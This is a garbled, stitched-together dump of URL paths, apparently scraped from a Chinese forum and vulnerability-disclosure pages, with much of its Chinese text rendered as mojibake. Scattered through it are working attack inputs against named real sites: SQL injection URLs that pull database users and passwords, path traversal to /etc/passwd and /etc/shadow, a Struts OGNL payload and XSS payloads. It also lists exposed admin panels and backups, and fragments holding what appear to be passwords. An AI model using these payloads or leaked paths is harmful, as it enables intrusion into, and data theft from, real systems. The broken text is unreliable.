/detail/2467959?username=binpda&bid=80&subject=鏅掓檼鎴戜腑鏍囩殑鍑犱唤鍥藉鑷劧绉戝鍩洪噾鏍囦功&csrfToken=b27fa8dd-a778-44c9-8797-e5a6e431404c&action=Delete&fileId=0&limit= /detail/4042020?username=jiaqing5604128&bid=46&subject=鏉ュ緱鏃�&csrfToken=bec9291b-18a4-4e70-aa2d-520d8d1466e9&action=Delete&fileId=0&limit= /detail/4035865?username= /detail/4038512?username= /detail/4033928?username= /detail/4032825?username= /detail/4030539?username= /detail/4035884?username= /detail/4032547?username= /detail/4036422?username= /detail/4035865?username=鏉庢厱鐧�&bid=116&subject= /detail/4033928?username=闀块潚钘ょ紪杈�&bid=45&subject= /detail/4034764?username= /detail/4030539?username=s_dxding&bid= /detail/4038512?username=鐏北鍏堢敓&bid= /detail/4035884?username=閫�&bid=48&subject= /detail/4032825?username=nndmx&bid= /detail/4028273?username= /detail/4032547?username=鏉庢厱鐧�&bid=116&subject= /detail/4036422?username=razgriz&bid= /detail/4034764?username=wangjo731&bid= /detail/4030539?username=s_dxding&bid=57&subject= /detail/4033928?username=闀块潚钘ょ紪杈�&bid=45&subject=鍝堜經澶у鏁欐巿鏁欎綘鍐欒鏂�&csrfToken=393c8ecc-4f75-41e8-96df-299688dfbf1a&action= /detail/4038512?username=鐏北鍏堢敓&bid=51&subject= /detail/4035865?username=鏉庢厱鐧�&bid=116&subject=鍙f湇鎶楀嚌鑽�&csrfToken=c1edc834-f8cf-4be5-93b7-c413e7a74ef0&action= /detail/4032825?username=nndmx&bid=116&subject= /detail/4035884?username=閫�&bid=48&subject=A&csrfToken= /detail/4028273?username=boty&bid= /detail/4032547?username=鏉庢厱鐧�&bid=116&subject=stroke&csrfToken= /detail/4036422?username=razgriz&bid=57&subject= /detail/4033928?username=闀块潚钘ょ紪杈�&bid=45&subject=鍝堜經澶у鏁欐巿鏁欎綘鍐欒鏂�&csrfToken=393c8ecc-4f75-41e8-96df-299688dfbf1a&action=Delete&fileId= /detail/4032825?username=nndmx&bid=116&subject=Initial&csrfToken= /detail/4028273?username=boty&bid=48&subject= /detail/4035884?username=閫�&bid=48&subject=A&csrfToken=3154d315-ab47-4286-85ba-ab07a8ca0f38&action= /detail/4035865?username=鏉庢厱鐧�&bid=116&subject=鍙f湇鎶楀嚌鑽�&csrfToken=c1edc834-f8cf-4be5-93b7-c413e7a74ef0&action=Delete&fileId= 
/detail/4038512?username=鐏北鍏堢敓&bid=51&subject=楹婚唹鐞嗗康涓庡疄鏂�&csrfToken=279b54d9-2750-426b-9908-a294dd296294&action= /detail/4032547?username=鏉庢厱鐧�&bid=116&subject=stroke&csrfToken=195e49fa-e5bb-4f82-ba03-98842140f5c6&action= /detail/4034764?username=wangjo731&bid=238&subject= /detail/4030539?username=s_dxding&bid=57&subject=娣卞湷浣忛櫌鍖诲笀+闈㈣瘯鐪熼+鍙婄瓟妗�&csrfToken=e3f6c23d-54a6-40cb-8dac-5b67d0a3599d&action= /detail/4036422?username=razgriz&bid=57&subject=瀹夊窘鐪佺珛鍖婚櫌闆嗗洟2012灞婄澹渶姹傝〃&csrfToken= /detail/4033928?username=闀块潚钘ょ紪杈�&bid=45&subject=鍝堜經澶у鏁欐巿鏁欎綘鍐欒鏂�&csrfToken=393c8ecc-4f75-41e8-96df-299688dfbf1a&action=Delete&fileId=0&limit= /bbs/topic/22364469?done= /detail/4032825?username=nndmx&bid=116&subject=Initial&csrfToken=86bc9ac4-9984-402d-b814-84f076d94e6c&action= /detail/4035884?username=閫�&bid=48&subject=A&csrfToken=3154d315-ab47-4286-85ba-ab07a8ca0f38&action=Delete&fileId= /detail/4038512?username=鐏北鍏堢敓&bid=51&subject=楹婚唹鐞嗗康涓庡疄鏂�&csrfToken=279b54d9-2750-426b-9908-a294dd296294&action=Delete&fileId= /detail/4028273?username=boty&bid=48&subject=鍏ㄦ湰甯﹀瓧骞�&csrfToken=f6a08215-6cde-42ed-b95e-7e3dc571253b&action= /detail/4036422?username=razgriz&bid=57&subject=瀹夊窘鐪佺珛鍖婚櫌闆嗗洟2012灞婄澹渶姹傝〃&csrfToken=edef93da-2995-4d6b-9cec-ce636222c24e&action= /detail/4032547?username=鏉庢厱鐧�&bid=116&subject=stroke&csrfToken=195e49fa-e5bb-4f82-ba03-98842140f5c6&action=Delete&fileId= /detail/4034764?username=wangjo731&bid=238&subject=2011骞村叏鍥藉尰瀛﹀崥澹嫳璇粺鑰冪湡棰樺惉鍔�&csrfToken=4aaa2658-de0a-47f6-b509-354f772c75f0&action= /detail/4030539?username=s_dxding&bid=57&subject=娣卞湷浣忛櫌鍖诲笀+闈㈣瘯鐪熼+鍙婄瓟妗�&csrfToken=e3f6c23d-54a6-40cb-8dac-5b67d0a3599d&action=Delete&fileId= /detail/4035865?username=鏉庢厱鐧�&bid=116&subject=鍙f湇鎶楀嚌鑽�&csrfToken=c1edc834-f8cf-4be5-93b7-c413e7a74ef0&action=Delete&fileId=0&limit= /detail/4032825?username=nndmx&bid=116&subject=Initial&csrfToken=86bc9ac4-9984-402d-b814-84f076d94e6c&action=Delete&fileId= 
/detail/4038512?username=鐏北鍏堢敓&bid=51&subject=楹婚唹鐞嗗康涓庡疄鏂�&csrfToken=279b54d9-2750-426b-9908-a294dd296294&action=Delete&fileId=0&limit= /bbs/?bid= /detail/4035884?username=閫�&bid=48&subject=A&csrfToken=3154d315-ab47-4286-85ba-ab07a8ca0f38&action=Delete&fileId=0&limit= /detail/4028273?username=boty&bid=48&subject=鍏ㄦ湰甯﹀瓧骞�&csrfToken=f6a08215-6cde-42ed-b95e-7e3dc571253b&action=Delete&fileId= /detail/4030539?username=s_dxding&bid=57&subject=娣卞湷浣忛櫌鍖诲笀+闈㈣瘯鐪熼+鍙婄瓟妗�&csrfToken=e3f6c23d-54a6-40cb-8dac-5b67d0a3599d&action=Delete&fileId=0&limit= /detail/4034764?username=wangjo731&bid=238&subject=2011骞村叏鍥藉尰瀛﹀崥澹嫳璇粺鑰冪湡棰樺惉鍔�&csrfToken=4aaa2658-de0a-47f6-b509-354f772c75f0&action=Delete&fileId= /detail/4032547?username=鏉庢厱鐧�&bid=116&subject=stroke&csrfToken=195e49fa-e5bb-4f82-ba03-98842140f5c6&action=Delete&fileId=0&limit= /detail/4032825?username=nndmx&bid=116&subject=Initial&csrfToken=86bc9ac4-9984-402d-b814-84f076d94e6c&action=Delete&fileId=0&limit= /bbs/topic/22364469?done=/bbs/topic/22364469&ct= /bbs/topic/21945406?done= /detail/4036422?username=razgriz&bid=57&subject=瀹夊窘鐪佺珛鍖婚櫌闆嗗洟2012灞婄澹渶姹傝〃&csrfToken=edef93da-2995-4d6b-9cec-ce636222c24e&action=Delete&fileId= /bbs/?bid=15&done= /detail/4028273?username=boty&bid=48&subject=鍏ㄦ湰甯﹀瓧骞�&csrfToken=f6a08215-6cde-42ed-b95e-7e3dc571253b&action=Delete&fileId=0&limit= /detail/4034764?username=wangjo731&bid=238&subject=2011骞村叏鍥藉尰瀛﹀崥澹嫳璇粺鑰冪湡棰樺惉鍔�&csrfToken=4aaa2658-de0a-47f6-b509-354f772c75f0&action=Delete&fileId=0&limit= /detail/4036422?username=razgriz&bid=57&subject=瀹夊窘鐪佺珛鍖婚櫌闆嗗洟2012灞婄澹渶姹傝〃&csrfToken=edef93da-2995-4d6b-9cec-ce636222c24e&action=Delete&fileId=0&limit= /bbs/topic/21945406?done=/bbs/topic/21945406&ct= /bbs/?bid= /bbs/?bid=15&done=/bbs/post/page&ct= /bbs/topic/22329723?done= /bbs/?bid=57&done= /bbs/topic/22371336?done= /bbs/topic/22329723?done=/bbs/topic/22329723&ct= /bbs/topic/22371336?done=/bbs/topic/22371336&ct= /bbs/?bid=57&done=/bbs/post/page&ct= /bbs/topic/22369964?done= 
/bbs/topic/22369964?done=/bbs/topic/22369964&ct= /bbs/topic/22351661?done= /bbs/topic/22351661?done=/bbs/topic/22351661&ct= /bbs/topic/22363485?done= /bbs/topic/22366147?done= /bbs/topic/22363485?done=/bbs/topic/22363485&ct= /bbs/topic/22366147?done=/bbs/topic/22366147&ct= /bbs/topic/22372053?done= /bbs/topic/22350623?done= /bbs/topic/22340909?done= /bbs/topic/22350623?done=/bbs/topic/22350623&ct= /bbs/topic/22372053?done=/bbs/topic/22372053&ct= /bbs/topic/22342254?done= /bbs/topic/22340909?done=/bbs/topic/22340909&ct= /bbs/topic/22342254?done=/bbs/topic/22342254&ct= /bbs/topic/22347032?done= /bbs/topic/22347032?done=/bbs/topic/22347032&ct= /bbs/?bid= /bbs/topic/21945406?done= /bbs/?bid= /detail/4030788?username= /bbs/?bid=131&done= /bbs/topic/21945406?done=/bbs/topic/21945406&ct= /detail/4030788?username=shumufeng&bid= /bbs/?bid=50&done= /bbs/?bid= /bbs/?bid=131&done=/bbs/post/page&ct= /bbs/?bid=50&done=/bbs/post/page&ct= /detail/4030788?username=shumufeng&bid=116&subject= /bbs/?bid=51&done= /bbs/topic/22327657?done= /detail/4032111?username= /bbs/?bid=51&done=/bbs/post/page&ct= /detail/4032111?username=鏉庢厱鐧�&bid=116&subject= /bbs/topic/22327657?done=/bbs/topic/22327657&ct= /detail/4030788?username=shumufeng&bid=116&subject=ng-Term&csrfToken= /detail/4032111?username=鏉庢厱鐧�&bid=116&subject=AF&csrfToken= /bbs/?bid= /bbs/?bid= /bbs/?bid=89&done= /detail/4030788?username=shumufeng&bid=116&subject=ng-Term&csrfToken=e2d8c014-01fd-4a9f-acea-51d3278780f7&action= /detail/4032111?username=鏉庢厱鐧�&bid=116&subject=AF&csrfToken=f5eb1d11-c610-49d2-9e32-b357756bd682&action= /bbs/?bid=47&done= /bbs/?bid=89&done=/bbs/post/page&ct= /detail/4032111?username=鏉庢厱鐧�&bid=116&subject=AF&csrfToken=f5eb1d11-c610-49d2-9e32-b357756bd682&action=Delete&fileId= /detail/4030788?username=shumufeng&bid=116&subject=ng-Term&csrfToken=e2d8c014-01fd-4a9f-acea-51d3278780f7&action=Delete&fileId= 
/detail/4032111?username=鏉庢厱鐧�&bid=116&subject=AF&csrfToken=f5eb1d11-c610-49d2-9e32-b357756bd682&action=Delete&fileId=0&limit= /detail/4030788?username=shumufeng&bid=116&subject=ng-Term&csrfToken=e2d8c014-01fd-4a9f-acea-51d3278780f7&action=Delete&fileId=0&limit= /bbs/?bid= /bbs/?bid=47&done=/bbs/post/page&ct= /bbs/?bid=119&done= /bbs/topic/22308800?done= /bbs/topic/22287458?done= /bbs/topic/22285415?done= /bbs/topic/22269094?done= /bbs/topic/22268022?done= /bbs/topic/22230448?done= /bbs/topic/22265918?done= /bbs/topic/22245736?done= /bbs/?bid=119&done=/bbs/post/page&ct= /bbs/topic/22308800?done=/bbs/topic/22308800&ct= /bbs/topic/22268022?done=/bbs/topic/22268022&ct= /bbs/topic/22285415?done=/bbs/topic/22285415&ct= /bbs/topic/22287458?done=/bbs/topic/22287458&ct= /bbs/topic/22230448?done=/bbs/topic/22230448&ct= /bbs/topic/22265918?done=/bbs/topic/22265918&ct= /bbs/topic/22269094?done=/bbs/topic/22269094&ct= /bbs/topic/22245736?done=/bbs/topic/22245736&ct= /bbs/?bid= /bbs/topic/22346533?done= /common/下任意文件,还有http://www.shanxiwindow.net/common/或许还有其他的。 /zhaopin/list.php?q=&division=%E4%B8%80%E6%B7%98%2C%E6%B7%98%E5%AE%9D%E5%95%86%E5%9F%8E%2C%E6%B7%98%E5%AE%9D%E7%BD%91%2C%E8%81%9A%E5%88%92%E7%AE%97&location=%E6%9D%AD%E5%B7%9E%2C%E5%B9%BF%E5%B7%9E&fc=&sc=%E8%90%A5%E9%94%80%E7%AD%96%E5%88%92&tc=&type=&page=1 /litmap.php?coordx=121.549991&coordy=31.294436&cid=7245b21f-0def-46c5-9ab6-de0752f6d6c7 /litmap.php?coordx=121.549991&coordy=31.294436&cid=7245b21f-0def-46c5-9ab6-de0752f6d6c7 / /index.html /tomad/page/skype/home_button.html)其代码如下: /TomFlash.js /tomad/page/skype/SkypeAppS.js /skype/skype-main-bt.js /skype/skype-main-bt.js?'+Math.random()+ /CodeAward/pages/vildcode.aspx / /admin/admin_login.php /hy/08/ao01/manager/ /hy/08/jinyi/manager/ /hy/10/hs01/manager/ /catjojo/08/19z/manager/ /mj/hongxing/manager/ /catjojo/zf/ /xincheng/renmin/admin/login.asp /xincheng/lanzuan/admin/main.asp /xincheng/yulong/admin/login.asp /xincheng/shengjing/admin/login.asp 
/xincheng/qingshui/admin/login.asp /xincheng/jingdian/admin/login.asp /xincheng/yijing/admin/login.asp /xincheng/changdao/admin/login.asp /xincheng/gongguan/admin/login.asp /xincheng/lanzuan/admin/login.asp /xincheng/yihao/admin/login.asp /xincheng/renmin/admin/login.asp /xincheng/yihao/admin/login.asp /xincheng/shangdong/admin/login.asp /manager/news/manager.asp /hr/cgi-bin/admin/login.html /ad/zzk/vote/vote.asp?id=12 /manager/ /huchen/aoyuansell/shownews.asp?id=6 /myadmin/ /UserSmsInfo.aspx?ID=123123 /UserSmsInfo.aspx?ID=222222 /UserSmsInfo.aspx?ID=555555 /webcontroller?functionId=2613&lmid=LM000000001275 /sofprogecslive/1.jsp /upload/ /default/index.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa) /vulndb/15431 /advisories/32495/ /exploits/14360/ /MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa) /viewvc?view=revision&revision=956389 /eWebEditor/admin_login.asp /session?username=%22%3E%3Cscript%3Ealert(%22%E8%80%81%E6%B4%9E%E8%BF%98%E6%B2%A1%E8%A1%A5%22)%3C/script%3E //manage/Modle/UploadFile/ListFiles.aspx / /1.txt /asp/zhaoping/oneseeker.asp?id=42443 /asp/zhaoping/oneseeker.asp?id=42443 /Asp/Home/Homefitment/FitmentDemand.asp?fitmentid=4526 /Asp/Home/Homefitment/FitmentDemand.asp?fitmentid=4526 / /tl/skill.php?id=402 /opta/live.php?id=f133588 /yh/card_product.php?id=70 /helen.jsp /2009/0909/wuliangye/article.php?id=58 /ScalB2CWeb/News/BottomNewText.aspx?code=NC00374 /loreal/s.php?id=111 /learning/read_art_sub.315.php?artid=38587%20and%201=2%20union%20select%201,2,3,4,user%28%29,6,7,8,9,0,1,2,3%23 /auto/read_art_sub.315.php?artid=37733%20and%201=2%20union%20select%201,2,3,4,concat%28user,0x7c,password,0x7c,host%29,6,7,8,9,0,1,2,3%20from%20mysql.user%23 /dragon/viewindex/radio/radio_cache.php?kindid=663 /dragon/admin/commend_list.php?start=50,1%23&classid=15 /crv_mediaReport.php?nid=440 /laofang/show.php?pid=192 /10086.zip /img/baidu_logo.gif /xss.js 
/website/news_content.php?id=322&type=1,此URL的ID字段由于没有对参数进行正确过滤,导致SQL注射漏洞 /purchase/InitCart.aspx?pid=10067402&pcount=1&ptype=1 /product/ProductIndex.aspx?startStr=C%27 /product/ProductIndex.aspx?startStr=C%27 /person/ /ExStepTwo/StepTwo/212021461664这个地址属于退货逻辑,后台调用http://returns.vancl.com/PublicHandlers/AddrAscx/Handler1.ashx?orderid=212021461664&target=defaultaddr,但是缺乏必要的权限验证,导致可以泄漏其他用户信息 /manage/ /manage/system-manage/initEditAdministratorAction.do?id=1 /manage/ /manage/ /was/portals/index.jsp /laofang/show.php?pid=192 /article.php?id=553 /votelist /special/hero56/ /trtxsqy/introduce_yc.php?id='%60%228rk1B /trtxsqy/introduce_yc.php?id='%60%228rk1B /) /1680241201/y9ZarqaHo /ph.asp /ph.asp /tp_sub.asp /tile/service/standard:orderDetailAsyncProxy.tile?outBizNo=201203188361200&bizIdentity=ttc10001 /enterRFD/gd/270 /enterRFD/gd/270 /enterRFD/gd/270%20and%20exists%28select%20name%20from%20sysobjects%29-- /aip_backup/RPT/inf_monthdata/HB_Datastation/AutoLoader.inibf mi:ss mi:ss yyyymmdd% yyyymmdd% yyyymmdd% nn:00;开始时间=00:00:00;结束时间=23:59:59;间隔=30;单位=天;}数据库设置={数据库类别=ORACLE;用户名=crm;密码=AEB3A4;服务器=ora11145;数据库=master;行数=1000;}SQL={select yyyymmdd% mi:ss mi:ss /aip_backup/RPT/DataStation/DataStation.log.bak /aip_backup/RPT/%E5%BD%A9%E9%93%83%E6%99%BA%E8%83%BD%E6%8A%A5%E8%A1%A8%E7%B3%BB%E7%BB%9F/INRPT%E6%99%BA%E8%83%BD%E6%8A%A5%E8%A1%A8%E5%B7%A5%E5%85%B7/INRPTV200R001D521/readme.txt /aip_backup/RPT/%E6%96%B0%E5%BB%BA%E6%96%87%E4%BB%B6%E5%A4%B9/sm_info_resource_zh.properties /aip_backup/PUSHDB31_20080709.sql /aip_backup/URP6/URP8100/Data/HelpFileIndex.ini /aip_backup/URP6/URP8100/onlinehelp/SoftX3000TOC.HHC /aip_backup/URP6/URP8100/onlinehelp/SoftX3000_TOC.IDX /mp3/color/color_download_new_2010-02-22.txt /aip_backup/RPT/%E6%99%BA%E8%83%BD%E6%8A%A5%E8%A1%A820070928/USDP%20REPORT%20V1%5B1%5D.0D11B40_INF_HBYD/USDP%20REPORT%20V1.0D11B40_INF_HBYD/%E5%AE%89%E8%A3%85%E5%8C%85/AutoLoader_init.txt /aip_backup/aip1/CC08/Services/MAINTAIN.LOG.DIR/MAINTAIN_LOG_Tues.TXT 
/aip_backup/RPT/%E6%99%BA%E8%83%BD%E6%8A%A5%E8%A1%A820070930/datastation_NEW/AutoLoader.ini /aip_backup/RPT/inf_monthdata/HB_Datastation/DataStation.htm /aip_backup/profile20080716.txt /aip_backup/URP6/URP8100/Data/CMD-EXAMPLE.txt /aip_backup/RPT/DataStation_dongheyan/DataStation/DataStation.log /aip_backup/RPT/DataStation_dongheyan/%E5%A4%8D%E4%BB%B6%20AutoLoader.ini /aip_backup/aip1/CC08/OnlineHelp/Document/LST%20LOG.htm /comment_ajax.html?id=2892 /ads/ /ads/20120229/starwood/.svn/entries /ads/20120229/ /adclog/WebServices/ /moa/ /moa/ /ADCCSSPortal/MainPage_IV/SI_agent.aspx /music.rar /en.rar /zongg/ /zongg/ /zongg/index.asp /zongg/index.asp /zongg/index.asp /zongg/index.asp /zongg/index.asp /zongg/index.asp /zongg/ /zongg/ /zongg/index.asp /zongg/index.asp /zongg/index.asp /zongg/index.asp /zongg/index.asp /zongg/index.asp /zongg/index.asp /admin/admin_login.php /p/2自动跳转到http://wap.taobao.com/channel/act/sale/zckj5.xhtml?ttid=b0zc37 /ag/sms/ready?url=http://map.baidu.com/&callback=abc /newslist.asp?newsid=201203151129101160 /newslist.asp?newsid=201203131747001080 /i?ct=503316480&z=0&tn=baiduimagedetail&word=【XSS /z/q208786176.htm /application/cms/article.php?catid=70 /content.php?id=422298注入点 /out/4//ksbnjs.jsp /goto_video/file_list.php /admin/ //ashx/getDepList.ashx?area=0571111 /user/resume.do?action=Download&resumeId=85391&resumeType=2 /dsb_zyyfw/wdtsg/wszxt/ /TrainQuery/autocomplete.do /coursecommentlist.aspx?id=51 /columncontentlist.aspx?id=48都存在注入 /log/20120317.txt /store/purchase/item /TR/xhtml1/DTD/xhtml1-transitional.dtd /1999/xhtml /store/purchase/item /manager/html /2j/news/mj.asp?AClassId=1&ANClassID=1&ID=100+and+@@version%3E0 /wzcx/lookup.aspx /?$=1910,(因为存在一些兼容问题,现在已经改成其他的了……) /$0000 /root@lcx.cc%3E,Holy /$1,返回结果: /$000000000000000000000000000000000000000000000000000000000000000000000000000000000000 /$000 /$=000 /$=00 /$1111111100000000,返回:/link%3E,Url /$%E5%B1%8C%E7%82%B8%EF%BC%81,返回: CF_Only_Open_Safe_URL,越来越接近真相了哦,亲~ 
/$%01%02%03%04%04%05%06%07%08%08%08%08%08%08%08%08%08%08%08%08%08%08 /$0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 /tr%20bkIndex=1%20bgColor=#fbfafa%20id=itemId_32%20onclick=SetCurSel(this)%20ondblclick%20='OnDbClickItem(this)'%20dCount=0 87AF538B-F052-4A0B-BAE0-E686AD921119'%20class=imgHead Head\1.png /tr 87AF538B-F052-4A0B-BAE0-E686AD921119 Head\1.png 
/$11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 
/$888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
8888888888888888888888888888888888888888888888880 /items%3E%3Citem%20title=%22一个月未登录%22%20tips=%22该分组中一个月未登录好友%22%20value=%2231%22%20/%3E%3Citem%20title=%22三个月未登录%22%20tips=%22该分组中三个月未登录好友%22%20value=%2291%22%20/%3E%3Citem%20title=%22半年未登录%22%20tips=%22该分组中半年未登录好友%22%20value=%22184%22%20/%3E%3C/items%3E //A%3E%3C/font%3E%3Cfont%20style=%22font-size:20pt;font-family:'微软雅黑','MS%20Sans%20Serif',sans-serif;%22%20color='800040'%3E%3Cbr%3E%3Cbr%3E打开该链接……%3C/font%3E //A 20pt;font-family:'微软雅黑','MS Qzone_TipFrame_QzoneTipBack_clientBkg.png%22%20drawMode=%229Grid%2 Qzone_TipFrame_Q Qzone_TipFrame_QzoneTipBack_clientBkg.png Qzone_TipFrame_QzoneTipBack_clientBkg_hightlight.png /app/mail/login / /select.aspx /select.aspx?search=99999999 /manage/login.aspx www.vancl.com,把您要买的商品加入购物车。 /在购物车里就能找到你刚才加入的商品,这里先不使用礼品卡,以及任何操作,一直选择确认,直到下单订单成功!减去10元。 /domain/cer.net?IDDomain=11558213,可根据次路径后的数字变量切换不同的域名证书并打印下载下来,可根据此证书对客户进行社工,也可以用此域名证书对时代互联客服作为取回用户密码的凭证,并且不同地方的工信局可以根据域名证书注销域名备案,造成恶意注销他人备案。 / /order/GetOrderDetail/.mvc?orderid=orderid /php/,存在SQL注入,注入点为: /php/pages_tztg.php?wzid=5111,经过猜解,获得了后台管理员账号密码。通过后台http://www.hkjxj.gov.cn/admin/登入。 /defaultroot/public/jsp/multiupload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jpeg,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 /daren/ /corp/view/vRPD_NewStockMeetingDetail.php?companycode=80198468 /.svn/text-base/SQLDao.jsp.svn-base /customer/userinfo.php?user=admin /ServiceAdmin/login.aspx //winners.591hx.com/SQ_hisJymx.aspx?u=sjh112630有漏洞,杳无音讯,今天查看漏洞已经补好了;再公布一个地址: /SQ_Fund_HisDisplaylog_new.aspx。。。这站很多漏洞噢,大家慢慢找吧,我这里收集几个 /cntv/login.php?session_key= /bug.php?action=view&id=5416。此EXP可激活此版本中的一句话后门。 /cgi-bin/quan_add_frnd /play.asp?id=2918 /index.php?id=5335&r=resource/show&vid=2 /admin.php /jsp/playershow/upswf.jsp?siteid=8 /article/730.htm /red/News_Text.php?class_id=3&id=1499 /lenovo/wsi/modules/driverdownload.aspx?searchtype=1 
/fw.asp?id=34 /showtopic-135589.html /bbs/admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1 /bbs/admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1 /bbs/admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1 /bbs/tools/1.aspx /view/e79a88b265ce0508763213ed.html?l=2.1.1 /index.php/crowdtest/post/showPost/postId/8236/pageNum/0%22%3E%3Cimg%20src=1%20onerror=alert(1)%3E /netdisk/home /2011ahhjnd/getcomm.php?tid=-8 /book/catalog.php?book=195292 /.svn/text-base/SQLDao.jsp.svn-base /?q=node/18 /Public/Brief-IntroDuction-Show.asp?CourseId=25 /jinpaijiaolian/admin.php /volvo/admin.php?pwd=NKsNqNJbPxQHM9YK /bbs/robots.txt /sql/ /scripts/frontmaker/idmapdb.py / /user/createSmsCode/?mobile=手机号 /na/memberlist.php?org=123 /logon.jsp /left.jsp /flyingcity/admin/ /flyingcity/qzInfoAction/checkgsjj.action?id=2790 /modules.php?name=Downloads&d_op=viewdownload&cid=44%20and%201=1 /admin/index.html /admin/mes_admin.php?do=soft_up&id=408%20and%20user%3E0 /dlnew/accept_ver_new.php_bak / /config/config.ini /admin/index.html /upload/oday.php /download/pas$log.txt /phpinfo.php /dlarea_t/download_web.php?fn=../../../../../../etc/passwd&bid=3864&bname=%CD%A8%D3%C3%C7%F8&seid=1229&sename=Android&mid=1946%27&mname=Gpad&adv= /dlarea_t/download_web.php?fn=../global.php&bid=3864&bname=%CD%A8%D3%C3%C7%F8&seid=1229&sename=Android&mid=1946%27&mname=Gpad&adv= /dlxhtml/download.php?fn=../download/xx.php&bid=1&bname=%E9%80%9A%E7%94%A8%E5%8C%BA&mid=1919&mname=WM6.0%E5%8F%8A%E4%BB%A5%E4%B8%8A /manager/ /main/admin/adv_img.php /etc/shadow /main/dlquery_s.php?bid=3864&bname=%CD%A8%D3%C3%C7%F8&seid=1229&sename=Android&mid=1946&mname=Gpad&tyid=2705 /bbs/admin/ajaxlog.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1 /admin/ /home.do?sid=T_sILl5ehMU2xxEK2ThaGu&cp_config=2&from=6000202 /96333partner/love_ceo/answer.jsp?id=31%20and%201=2%20union%20select%201,2,3,4,5-- / 
/auto/cardb/dealer.php?action=DealerPic&seriesid=304&dealerid=1043%20and%201=2%20union%20select%201,user%28%29,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7%23 /auto/cardb/dealer.php?action=DealerInfo&dealerid=1218%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7%23 0A21AD68 0A21AD6E 0A21AD71 0A21AD73 0A21AD77 0A21AD79 0A21AD80 0A21AD83 0A21AD84 0A21AD88 0A21AD8C 0A21AD91 0A21AD92 0A21CC9B 0A21CCA1 0A21CCA5 0A21CCA7 0A21CCAB 0023:00000000= /na/memberlist.php?org=2%27union%20select%201,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20information_schema.columns%20where%20table_schema=database%28%29%20%20/* /web/succmoney.aspx?id=2803681 /temp/201203281531479688022.jpg /photo/fldel.aspx?delpath=201203281531479688022.jpg /photo/fldel.aspx?delpath=../../xxxxxxxxx.aspx /Result.aspx?city=%BD%F0%BB%AA&type=25%0aor%0a1=1&key=s#main /Result.aspx?city=%BD%F0%BB%AA&type=25%0aor%0a1=2&key=s#main /ktv_new/in_ktvroom.aspx?serverid=4--&userid=%D3%CE%BF%CD12241428&search_type=1 /I_ADdata.aspx?bId=2-- /chatAreaN.aspx?chatZoneID=1&&hwnd=1573510-- 